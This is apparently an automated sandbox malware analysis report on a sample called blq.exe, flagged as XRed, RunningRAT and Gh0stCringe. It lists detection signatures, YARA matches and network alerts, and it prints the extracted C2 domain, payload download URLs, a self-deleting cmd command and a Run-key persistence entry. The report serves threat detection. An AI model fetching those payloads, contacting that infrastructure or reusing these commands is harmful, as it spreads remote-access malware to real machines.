Windows Analysis Report
blq.exe

Overview

General Information

Sample name: blq.exe
Analysis ID: 1580529
MD5: 6153a06b74491bacb664bf142b598c69
SHA1: dade36a11a568e3b0b5f3e7fd44b566182702534
SHA256: 0b510380e52b3c97e7a2f227eb9ecda6a194885da74fac6630f1eb7d5ee6091f
Tags: DarkComet, exe, user-sicehicetf
Infos:

Detection

Gh0stCringe, RunningRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gh0stCringe
Yara detected RunningRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • blq.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\blq.exe" MD5: 6153A06B74491BACB664BF142B598C69)
    • ._cache_blq.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\._cache_blq.exe" MD5: 2C8E6B45F0113B45F9187B60DF114FEF)
      • cmd.exe (PID: 7804 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 7848 cmdline: ping 127.0.0.1 -n 1 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • Synaptics.exe (PID: 7644 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 64C0A5B375F1AB0C44808320D5AF9E84)
      • WerFault.exe (PID: 7032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7636 cmdline: C:\Windows\SysWOW64\svchost.exe -k "encvbk" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • svchost.exe (PID: 7664 cmdline: C:\Windows\SysWOW64\svchost.exe -k "encvbk" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • encvbk.exe (PID: 8056 cmdline: C:\Windows\system32\encvbk.exe "c:\program files (x86)\6795234.dll",MainThread MD5: 889B99C52A60DD49227C5E485A016679)
  • EXCEL.EXE (PID: 7704 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 1900 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • svchost.exe (PID: 7984 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Synaptics.exe (PID: 7636 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 64C0A5B375F1AB0C44808320D5AF9E84)
  • svchost.exe (PID: 6808 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6952 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7644 -ip 7644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7356 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7644 -ip 7644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7572 cmdline: C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Running RAT | NJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server to change the address the trojan communicates with. The second DLL gathers information about the victim's system, including its operating system and driver and processor information. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-bugging techniques. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
blq.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security
blq.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
blq.exe | MALWARE_Win_RunningRAT | Detects RunningRAT | ditekSHen
  • 0xbd1c4:$s1: %s%d.dll
  • 0xbd2d0:$s2: /c ping 127.0.0.1 -n
  • 0xbd2ea:$s3: del /f/q "%s"
  • 0xbd0dc:$s4: GUpdate
  • 0xbd2a0:$s5: %s\%d.bak
  • 0xbd1d9:$s6: "%s",MainThread
  • 0xbd1ec:$s7: rundll32.exe
  • 0xb769d:$rev1: emankcosteg
  • 0xb78c2:$rev3: daerhTniaM,"s%" s%
  • 0xb7c16:$rev4: s% etadpUllD,"s%" 23lldnuR
  • 0xb7d43:$rev5: ---DNE yromeMmorFdaoL
  • 0xb7d38:$rev6: eMnigulP
  • 0xb78b3:$rev7: exe.23lldnuR\
  • 0xb7bbc:$rev8: dnammoc\nepo\llehs\
  • 0xb7bf3:$rev8: dnammoc\nepo\llehs\
  • 0xb7d9d:$rev9: "s%" k- exe.tsohcvs\23metsyS\%%tooRmetsyS%
  • 0xb7643:$rev10: emanybtsohteg
  • 0xb7671:$rev11: tekcosesolc
  • 0xb767e:$rev12: tpokcostes
  • 0xb76a9:$rev13: emantsohteg

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\._cache_blq.exe | JoeSecurity_RunningRAT | Yara detected RunningRAT | Joe Security
C:\Users\user\Desktop\._cache_blq.exe | GoldDragon_RunningRAT | Detects Running RAT from Gold Dragon report | Florian Roth
  • 0x402f:$a1: emanybtsohteg
  • 0x405d:$a2: tekcosesolc
  • 0x4089:$a3: emankcosteg
  • 0x4095:$a4: emantsohteg
  • 0x406a:$a5: tpokcostes
  • 0x400e:$a6: putratSASW
C:\Users\user\Desktop\._cache_blq.exe | MALWARE_Win_RunningRAT | Detects RunningRAT | ditekSHen
  • 0x9bb0:$s1: %s%d.dll
  • 0x9cbc:$s2: /c ping 127.0.0.1 -n
  • 0x9cd6:$s3: del /f/q "%s"
  • 0x9ac8:$s4: GUpdate
  • 0x9c8c:$s5: %s\%d.bak
  • 0x9bc5:$s6: "%s",MainThread
  • 0x9bd8:$s7: rundll32.exe
  • 0x4089:$rev1: emankcosteg
  • 0x42ae:$rev3: daerhTniaM,"s%" s%
  • 0x4602:$rev4: s% etadpUllD,"s%" 23lldnuR
  • 0x472f:$rev5: ---DNE yromeMmorFdaoL
  • 0x4724:$rev6: eMnigulP
  • 0x429f:$rev7: exe.23lldnuR\
  • 0x45a8:$rev8: dnammoc\nepo\llehs\
  • 0x45df:$rev8: dnammoc\nepo\llehs\
  • 0x4789:$rev9: "s%" k- exe.tsohcvs\23metsyS\%%tooRmetsyS%
  • 0x402f:$rev10: emanybtsohteg
  • 0x405d:$rev11: tekcosesolc
  • 0x406a:$rev12: tpokcostes
  • 0x4095:$rev13: emantsohteg
C:\Program Files (x86)\6795234.dll | JoeSecurity_Gh0stCringe | Yara detected Gh0stCringe | Joe Security
C:\Program Files (x86)\6795234.dll | MALWARE_Win_RunningRAT | Detects RunningRAT | ditekSHen
  • 0x5534:$s4: GUpdate
  • 0x514c:$s5: %s\%d.bak
  • 0x55e3:$s6: "%s",MainThread
  • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
  • 0x515c:$v2_2: LoadFromMemory END---
  • 0x51d0:$v2_3: hmProxy!= NULL
  • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
  • 0x5610:$v2_6: %d*%sMHz

Source | Rule | Description | Author | Strings
00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp | JoeSecurity_Gh0stCringe | Yara detected Gh0stCringe | Joe Security
0000000A.00000002.4129317792.0000000010006000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_Gh0stCringe | Yara detected Gh0stCringe | Joe Security
00000001.00000000.1659507821.0000000000403000.00000008.00000001.01000000.00000005.sdmp | JoeSecurity_RunningRAT | Yara detected RunningRAT | Joe Security
00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RunningRAT | Yara detected RunningRAT | Joe Security

Source | Rule | Description | Author | Strings
10.2.encvbk.exe.10000000.1.unpack | JoeSecurity_Gh0stCringe | Yara detected Gh0stCringe | Joe Security
10.2.encvbk.exe.10000000.1.unpack | MALWARE_Win_RunningRAT | Detects RunningRAT | ditekSHen
  • 0x5534:$s4: GUpdate
  • 0x514c:$s5: %s\%d.bak
  • 0x55e3:$s6: "%s",MainThread
  • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
  • 0x515c:$v2_2: LoadFromMemory END---
  • 0x51d0:$v2_3: hmProxy!= NULL
  • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
  • 0x5610:$v2_6: %d*%sMHz
1.2.._cache_blq.exe.4032a0.1.unpack | JoeSecurity_Gh0stCringe | Yara detected Gh0stCringe | Joe Security
1.2.._cache_blq.exe.4032a0.1.unpack | MALWARE_Win_RunningRAT | Detects RunningRAT | ditekSHen
  • 0x5910:$s1: %s%d.dll
  • 0x5a1c:$s2: /c ping 127.0.0.1 -n
  • 0x5a36:$s3: del /f/q "%s"
  • 0x4934:$s4: GUpdate
  • 0x5828:$s4: GUpdate
  • 0x454c:$s5: %s\%d.bak
  • 0x59ec:$s5: %s\%d.bak
  • 0x49e3:$s6: "%s",MainThread
  • 0x5925:$s6: "%s",MainThread
  • 0x5938:$s7: rundll32.exe
  • 0x44ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
  • 0x455c:$v2_2: LoadFromMemory END---
  • 0x45d0:$v2_3: hmProxy!= NULL
  • 0x4684:$v2_4: Rundll32 "%s",DllUpdate %s
  • 0x4a10:$v2_6: %d*%sMHz
1.0.._cache_blq.exe.400000.0.unpack | JoeSecurity_RunningRAT | Yara detected RunningRAT | Joe Security

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\blq.exe, ProcessId: 7560, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7644, TargetFilename: C:\Users\user\AppData\Local\Temp\OslfsL4J.xlsm
Source: Process started | Author: vburov | Data: Command: C:\Windows\SysWOW64\svchost.exe -k "encvbk", CommandLine: C:\Windows\SysWOW64\svchost.exe -k "encvbk", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe -k "encvbk", ProcessId: 7636, ProcessName: svchost.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-24T22:11:10.644957+010028326171Malware Command and Control Activity Detected192.168.2.44974069.42.215.25280TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-24T22:11:04.821651+010028148971Malware Command and Control Activity Detected192.168.2.449733103.36.221.1958790TCP

AV Detection

Source: blq.exe | Avira: detected
Source: http://xred.site50.net/syn/SUpdate.iniH)) | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.ini | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rar | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dlp | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dll | Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\._cache_blq.exe | Avira: detection malicious, Label: TR/AD.Farfli.qqkhu
Source: C:\ProgramData\Synaptics\RCXAFD2.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCXAFD2.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Program Files (x86)\6795234.dll | Avira: detection malicious, Label: BDS/Backdoor.Gen7
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/AD.Farfli.qqkhu
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: blq.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCXAFD2.tmp | ReversingLabs: Detection: 100%
Source: C:\ProgramData\Synaptics\Synaptics.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | ReversingLabs: Detection: 100%
Source: blq.exe | ReversingLabs: Detection: 92%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.9% probability
Source: C:\ProgramData\Synaptics\RCXAFD2.tmp | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\6795234.dll | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | Joe Sandbox ML: detected
Source: blq.exe | Joe Sandbox ML: detected
Source: blq.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49735 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49747 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49758 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49759 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49766 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49767 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49780 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49781 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49784 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49785 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49786 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49787 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49796 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49797 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49808 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49807 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49812 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49813 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49815 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49822 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49828 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49829 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49830 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49838 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49842 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49844 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49852 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49853 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49861 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49862 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49872 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49877 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49889 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49888 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49897 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49899 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49917 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49918 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49927 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49928 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49926 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49928 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49944 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49943 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49962 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49963 version: TLS 1.2
                          Source: Binary string: rundll32.pdb source: svchost.exe, 00000004.00000003.1664131085.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, encvbk.exe, encvbk.exe, 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, encvbk.exe.4.dr
                          Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000004.00000003.1664131085.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, encvbk.exe, 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, encvbk.exe.4.dr
                          Source: blq.exe, 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: [autorun]
                          Source: blq.exe, 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: autorun.inf
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [autorun]
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autorun.inf
                          Source: blq.exe Binary or memory string: [autorun]
                          Source: blq.exe Binary or memory string: autorun.inf
                          Source: RCXAFD2.tmp.0.dr Binary or memory string: [autorun]
                          Source: RCXAFD2.tmp.0.dr Binary or memory string: autorun.inf
                          Source: Synaptics.exe.0.dr Binary or memory string: [autorun]
                          Source: Synaptics.exe.0.dr Binary or memory string: autorun.inf
                          Source: ~$cache1.3.dr Binary or memory string: [autorun]
                          Source: ~$cache1.3.dr Binary or memory string: autorun.inf
                          Source: C:\Users\user\Desktop\blq.exe File opened: C:\Users\user\AppData\Roaming
                          Source: C:\Users\user\Desktop\blq.exe File opened: C:\Users\user
                          Source: C:\Users\user\Desktop\blq.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                          Source: C:\Users\user\Desktop\blq.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                          Source: C:\Users\user\Desktop\blq.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                          Source: C:\Users\user\Desktop\blq.exe File opened: C:\Users\user\AppData

                          Networking

                          Source: Network traffic Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49740 -> 69.42.215.252:80
                          Source: Network traffic Suricata IDS: 2814897 - Severity 1 - ETPRO MALWARE W32.YoungLotus Checkin : 192.168.2.4:49733 -> 103.36.221.195:8790
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49735 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49734 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49745 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49744 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49759 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49758 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49781 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49787 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49808 -> 142.250.181.14:443
                          Source: Network traffic Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49765 -> 142.250.181.14:443
